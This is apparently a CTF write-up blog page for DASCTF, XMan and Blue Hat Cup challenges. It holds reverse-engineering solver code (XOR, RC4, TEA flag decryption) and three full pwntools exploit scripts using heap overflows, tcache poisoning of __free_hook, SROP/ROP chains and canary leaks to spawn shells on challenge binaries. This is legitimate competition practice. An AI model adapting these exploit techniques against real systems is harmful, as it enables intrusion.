py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
def encode(s):
    str = ''
    for i in range(len(s)):
        res = ord(s[i]) ^ 32
        res += 31
        str += chr(res)

    return str

def decode(s):
    str = ''
    for i in range(len(s)):
        res = ord(s[i]) - 31
        res ^= 32
        str += chr(res)

    return str

m = 'ek`fz13b3c5e047b`bd`0/c268e600e7c5d1`|'
strings = ''
print decode(m)

apkrev

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#include <cstdio>
#include <cstring>

unsigned char enc[] =
{
  0x8C, 0xC4, 0x00, 0xE6, 0x6A, 0x88, 0xB8, 0x90, 0xC2, 0x07,
  0x6B, 0xA9, 0xC3, 0x0A, 0x3E, 0xC0, 0x44, 0xA6, 0xFE, 0x7E,
  0xF0, 0x59, 0x4C, 0x83, 0x3D, 0x2B, 0xE2, 0xD3, 0x38, 0xCB,
  0x82, 0x5B, 0x00
};

void rc4_init(unsigned char* s, unsigned char* key, unsigned long Len)
{
    int i = 0, j = 0;
    unsigned char k[256] = { 0 };
    unsigned char tmp = 0;
    for (i = 0; i < 256; i++)
    {
        s[i] = i;
        k[i] = key[i % Len];
    }
    for (i = 0; i < 256; i++)
    {
        j = (j + s[i] + k[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }
}

void rc4_crypt(unsigned char* s, unsigned char* Data, unsigned long Len)
{
    int i = 0, j = 0, t = 0;
    unsigned long k = 0;
    unsigned char tmp;
    for (k = 0; k < Len; k++)
    {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
        t = (s[i] + s[j]) % 256;
        Data[k] ^= s[t];
    }
}

int main()
{
    unsigned char s[256];
    unsigned char key[9] = "12345678";
    rc4_init(s, key, 8);
    rc4_crypt(s, enc, 32);
    printf("%s", enc);
    return 0;
}

LittleJunk

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#include <cstdio>
#include "defs.h"


void tea_decrypt(unsigned __int64* v, unsigned __int64* k)
{
	__int64 sum = 0, i;
	unsigned __int64 v0 = v[0], v1 = v[1], v2 = v[2], v3 = v[3];
	unsigned __int64 k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
	for (i = 0; i < 0x20; i++) 
		sum += 0x9E3779B9i64;
	for (i = 0; i < 32; i++)
	{
		v3 -= ((v2 << 4) + k2) ^ (v2 + sum) ^ ((v2 >> 5) + k3);
		v2 -= ((v3 << 4) + k0) ^ (v3 + sum) ^ ((v3 >> 5) + k1);
		v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
		v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
		sum -= 0x9E3779B9i64;
	}
	v[0] = v0;
	v[1] = v1;
	v[2] = v2;
	v[3] = v3;
}

void rc4_init(unsigned char* s, unsigned char* key, unsigned long Len)
{
	int i = 0, j = 0;
	unsigned char k[256] = { 0 };
	unsigned char tmp = 0;
	for (i = 0; i < 256; i++)
	{
		s[i] = i;
		k[i] = key[i % Len];
	}
	for (i = 0; i < 256; i++)
	{
		j = (j + s[i] + k[i]) % 256;
		tmp = s[i];
		s[i] = s[j];
		s[j] = tmp;
	}
}

void rc4_crypt(unsigned char* s, unsigned char* Data, unsigned long Len)
{
	int i = 0, j = 0, t = 0;
	unsigned long k = 0;
	unsigned char tmp;
	for (k = 0; k < Len; k++)
	{
		i = (i + 1) % 256;
		j = (j + s[i]) % 256;
		tmp = s[i];
		s[i] = s[j];
		s[j] = tmp;
		Data[k] ^= s[k];
	}
}


int main()
{
	unsigned __int64 v[] = { 
		0xE990A522BE80F786, 0x8B836286B8A5EB59, 0x2FDE61CCEFC70FF8, 0x56BC19E119C8B07B, 0
	};
	unsigned char k[] = "vTLHv`FTDC_vOPPEyam_uoyZht_deen_w";
	unsigned char s[256];
	unsigned char key[] = "dasctf:3";

	tea_decrypt(v, (unsigned __int64 *)k);
	for (int i = 0; i < 4; ++i)
	{
		int j = (i + 1) << 3;
		unsigned __int64 t = v[i];
		while (t)
		{
			((unsigned char*)v)[--j] = t & 0xFF;
			t >>= 8;
		}
	}
	rc4_init(s, key, 8);
	rc4_crypt(s, (unsigned char *)v, 32);
	printf("%s", v);
	return 0;
}

第五届 “蓝帽杯” Final PWN、RE Writeup

wjh 发布于 2021-09-03 收录于 Pwn Reverse CTF

PWN

secretcode

类似的题目遇到过很多次，主要原理都是通过侧信道来窃取数据，这次则是在原来的基础上加大了限制来提高利用难度。

这道题目还是蛮有意思的，nc 连接之后会给一个 base64 数据，解码之后发现是一个 ELF 文件，并且加了 UPX 壳，题目的内容是一个非齐次线性方程组，并且要求在 3 秒内给出解。我们解题脚本需要先脱壳，然后对二进制文件进行解析，解析后解方程组得到数据。本来想用 unicorn 来解决的，但是实际上并没有必要，因为这里的汇编代码都是成对且有规律的出现的（原始代码应该是直接生成的汇编，而不是通过了 C 语言来编译）。

Golang逆向分析 & 第五届XMan选拔赛 EzCM Writeup

wjh 发布于 2021-08-08 收录于 Reverse CTF

ezCM

直至比赛结束，这道题目都是 0 解题，一方面是因为比赛时间较短，另一方面还是因为这道题目较难，考察了不常见的椭圆曲线算法(ECC)，大大增加了对做题者的要求。

DASCTF July X CBCTF 4th PWN、RE部分 Writeup

wjh 发布于 2021-08-07 收录于 Pwn Reverse CTF

PWN

EasyHeap

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
from pwn import *

elf = None
libc = None
file_name = "./Easyheap"
#context.timeout = 1


def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary


def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc


def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)


def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address


def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag')
    return sh.recvrepeat(0.3)


def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()


def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def choice(idx):
    sh.sendlineafter(">> :", str(idx))


def add(size, content = 'wjh'):
    choice(1)
    sh.sendlineafter("Size:", str(size))
    sh.sendafter("Content:", str(content))

def delete(idx):
    choice(2)
    sh.sendlineafter("Index:", str(idx))

def show(idx):
    choice(3)
    sh.sendlineafter("Index:", str(idx))


def edit(idx, content):
    choice(4)
    sh.sendlineafter("Index:", str(idx))
    sh.sendafter("Content:", str(content))


def pwn(sh, elf, libc):
    context.log_level = "debug"
    add(-1) #0
    add(0x500, 'a' * 0x500) #1
    add(0x500, 'a' * 0x500) #2
    delete(1)
    edit(0, 'a' * 0x20)
    show(0)
    libc_base = get_address(sh, True, info='libc_base:\t', offset=-0x3ebca0)
    edit(0, 'a' * 0x18 + p64(0x511))
    add(0x88, 'a' * 0x88) #1
    add(0x88, 'a' * 0x88) #3
    delete(3)
    delete(1)

    edit(0, 'a' * 0x20)
    show(0)
    #sh.recvuntil('1.add')
    heap_base = u64(sh.recvuntil('1.add', drop=True)[-6:].ljust(8, '\x00')) - 0x320
    log.success("heap_base:\t" + hex(heap_base))
    edit(0, 'a' * 0x18 + p64(0xa1))
    free_hook_addr = libc_base + 0x3ed8e8
    setcontext_addr = libc_base + 0x521b5
    edit(0, 'a' * 0x18 + p64(0x511) + p64(free_hook_addr))
    add(0x88, 'a' * 0x88) #1
    add(0x88, 'a' * 0x88) #3
    edit(3, p64(setcontext_addr))
    pop_rdi_addr = libc_base + 0x215bf
    pop_rsi_addr = libc_base + 0x23eea
    pop_rdx_addr = libc_base + 0x1b96
    pop_rax_addr = libc_base + 0x43ae8
    syscall_addr = libc_base + 0xd2745

    # SROP
    fake_frame_addr = heap_base + 0x790
    frame = SigreturnFrame()
    frame.rdi = fake_frame_addr + 0xF8
    frame.rsi = 0
    frame.rdx = 0x100
    frame.rsp = fake_frame_addr + 0xF8 + 0x10
    frame.rip = pop_rdi_addr + 1  # : ret

    rop_data = [
        pop_rax_addr,  # sys_open('flag', 0)
        2,
        syscall_addr,
        pop_rax_addr,  # sys_read(flag_fd, heap, 0x100)
        0,
        pop_rdi_addr,
        3,
        pop_rsi_addr,
        fake_frame_addr + 0x200,
        syscall_addr,

        pop_rax_addr,  # sys_write(1, heap, 0x100)
        1,
        pop_rdi_addr,
        1,
        pop_rsi_addr,
        fake_frame_addr + 0x200,
        syscall_addr
    ]
    edit(2, str(frame).ljust(0xF8, '\x00') + 'flag\x00\x00\x00\x00' + '\x00' * 0x8 + flat(rop_data))
    gdb.attach(sh, "b free")
    delete(2)

    sh.interactive()


if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag is ' + re.search(r'flag{.+}', flag).group())

realNoOutput

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
from pwn import *

elf = None
libc = None
file_name = "./realNoOutput"
#context.timeout = 1


def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary


def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc


def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)


def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address


def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag')
    return sh.recvrepeat(0.3)


def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()


def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def choice(idx):
    sleep(1)
    sh.sendline(str(idx))

    #sleep(1)


def add(idx, size, content):
    choice(1)
    sh.sendline(str(idx))
    sh.sendline(str(size))
    sh.send(content)


def delete(idx):
    choice(2)
    sh.sendline(str(idx))


def edit(idx, content):
    choice(3)
    sh.sendline(str(idx))
    sh.send(str(content))


def show(idx):
    choice(4)
    sh.sendline(str(idx))




def pwn(sh, elf, libc):
    context.log_level = "debug"
    for i in range(8):
        add(i, 0x100, 'wjh')

    for i in range(8):
        delete(7 - i)

    add(8, 0x18, 'wjh')

    edit(0, 'a' * 0x20)
    show(0)
    libc_base = get_address(sh, True, info="libc_base:\t", offset=-0x1ebbe0)
    edit(0, 'sh' + '\x00' * (0x18 - 2) + p64(0xf1))
    add(9, 0xe8, 'a' * 0xe8)
    add(1, 0xe8, 'a' * 0xe8)
    delete(9)
    delete(1)
    free_hook_addr = libc_base + 0x1eeb28
    system_addr = libc_base + 0x55410
    edit(0, p64(free_hook_addr))
    add(9, 0xe8, 'a' * 0xe8)
    add(9, 0xe8, p64(system_addr))

    #gdb.attach(sh, "b *$rebase(0x00000000000016B1)")
    delete(8)
    sh.interactive()


if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag is ' + re.search(r'flag{.+}', flag).group())

old_thing

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
from pwn import *
elf = None
libc = None
file_name = "./canary3"
#context.timeout = 1

def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary

def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)

def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address

def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag')
    return sh.recvrepeat(0.3)

def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()

def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def pwn(sh, elf, libc):
    context.log_level = "debug"
    sh.sendafter('username: ', 'admin' + '\x00' * (0x20 - 5))
    sh.sendafter('password: ', '168' + '\x00' * (0x20 - 3))
    sh.sendlineafter('3.exit', '2')
    sh.sendafter('input:', 'a' * 0x19)
    sh.sendlineafter('3.exit', '1')
    data = sh.recvuntil('Do ', drop=True)
    pie = u64(data[-6:].ljust(8, '\x00')) - 0x2530
    canary = u64(data[-13:-6].rjust(8, '\x00'))
    log.success('canary:\t' + hex(canary))
    log.success('pie:\t' + hex(pie))
    sh.sendlineafter('3.exit', '2')
    sh.sendafter('input:', 'a' * 0x18 + p64(canary) + 'b' * 8 + p64(pie + 0x239F))
    #gdb.attach(sh, "b *$rebase(0x0000000000002526)")
    sh.sendlineafter('3.exit', '3')
    sh.interactive()

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag is ' + re.search(r'flag{.+}', flag).group())

REVERSE

shellcode

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#include <cstdio>
#include <cstring>

unsigned char sz[] =
{
  0x64, 0x2E, 0x90, 0x34, 0x41, 0xD8, 0x24, 0xCB, 0x52, 0x2E,
  0xFB, 0x39, 0x3E, 0x91, 0x07, 0x0E, 0x96, 0xF6, 0x3C, 0x09,
  0x9C, 0x21, 0x92, 0x21, 0xB2, 0xCC, 0x9F, 0x51, 0x48, 0x63,
  0x4C, 0x8F, 0x72, 0x5D, 0xBF, 0x6C, 0x51, 0x76
};

void rc4_init(unsigned char* s, unsigned char* key, unsigned long Len)
{
    int i = 0, j = 0;
    unsigned char k[256] = { 0 };
    unsigned char tmp = 0;
    for (i = 0; i < 256; i++)
    {
        s[i] = i;
        k[i] = key[i % Len];
    }
    for (i = 0; i < 256; i++)
    {
        j = (j + s[i] + k[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }
}

void rc4_crypt(unsigned char* s, unsigned char* Data, unsigned long Len)
{
    int i = 0, j = 0, t = 0;
    unsigned long k = 0;
    unsigned char tmp;
    for (k = 0; k < Len; k++)
    {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
        t = (s[i] + s[j]) % 256;
        Data[k] ^= s[t];
    }
}

int main()
{
    unsigned char s[256];
    unsigned char key[] = "golangc2";
    rc4_init(s, key, 8);
    rc4_crypt(s, sz, 38);
    printf("%s", sz);
    return 0;
}

replace

lua 虚拟机，rc4 的 key 在虚拟机实现中被修改了，倒序 base64

第五届XMan选拔赛 Nowaypwn Writeup

wjh 发布于 2021-08-07 收录于 Pwn CTF

nowaypwn

处理混淆

题目存在混淆，导致 IDA 未能识别出完整的函数

DASCTF 2021.08 RE Writeup

py